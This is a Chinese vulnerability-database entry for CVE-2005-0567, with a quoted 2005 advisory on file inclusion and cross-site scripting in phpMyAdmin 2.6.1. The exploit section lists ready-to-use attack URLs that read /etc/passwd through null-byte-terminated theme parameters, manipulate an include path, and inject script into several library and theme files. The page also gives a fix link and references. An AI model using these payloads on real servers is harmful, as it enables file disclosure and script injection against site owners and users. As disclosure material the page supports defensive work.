PHPMyAdmin多个本地文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1199707 漏洞类型 输入验证
发布时间 2005-05-02 更新时间 2006-09-28
CVE编号 CVE-2005-0567 CNNVD-ID CNNVD-200505-085
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2005090049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-085
|漏洞详情
phpMyAdmin2.6.1中存在多个PHP远程文件包含漏洞,允许远程攻击者通过修改(1)phpmyadmin.css.php的theme参数或者(2)database_interface.lib.php的cfg[Server][extension]参数以引用包含代码的远程Web服务器的URL来执行任意PHP代码。
|漏洞EXP
[phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 24.2.2005


- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.

- --- 1. Remote file inclusion ---

1.0

This bug exist in css/phpmyadmin.css.php. You can
include files. Error exist in

Code:
- ------
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
$theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
include($tmp_file);
} // end of include theme_right.css.php
- ------

And now you can get files.

For exemple:

http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
etc.

1.1
Or next include is in libraries/database_interface.lib.php

Code:

- ---
18# require_once('./libraries/dbi/' . $cfg['Server']['extension'] . '.dbi.lib.php');
- ---

For exemple:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3

Error message :
- ---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18

Fatal error: main() [function.require]: Failed opening
required './libraries/dbi/cXIb8O3.dbi.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
- ---------------


Or if you want and if you see php error and register_globals=on, can you make
xss with php buq. For Exemple:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E

- --- 2. XSS aka Cross Site Scripting ---
If register_globals=On:

2.0
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_serv
er_left=MyToMy&strServer=[XSS%20code]

http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[Bgcol
orOne]=777777%22%3E%3CH1%3E[XSS%20code]

http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServer
Choice=%3CH1%3EXSS

2.1
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=
Mi&bgcolor=%22%3E[XSS%20code]

http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=
Mi&row_no=%22%3E[XSS%20code]

2.2
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
and more in this file.

2.3
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]
and more in this file.

- --- 3. How to fix ---

CVS or
https://sourceforge.net/tracker/download.php?group_id=23067&atid=377408&file_id=122735&aid=1149381 >>
libraries/grab_globals.lib.php or wait for new version..

- --- 4.Contact ---
Author: Maksymilian Arciemowicz

|参考资料

来源:XF
名称:phpmyadmin-file-include(19465)
链接:http://xforce.iss.net/xforce/xfdb/19465
来源:BID
名称:12645
链接:http://www.securityfocus.com/bid/12645
来源:sourceforge.net
链接:http://sourceforge.net/tracker/index.php?func=detail&aid=1149381&group_id=23067&atid=377408
来源:SECUNIA
名称:14382
链接:http://secunia.com/advisories/14382/
来源:www.phpmyadmin.net
链接:http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-1
来源:BUGTRAQ
名称:20050224[SECURITYREASON.COM]phpMyAdmin2.6.1RemotefileinclusionandXSScXIb8O3.4
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110929725801154&w=2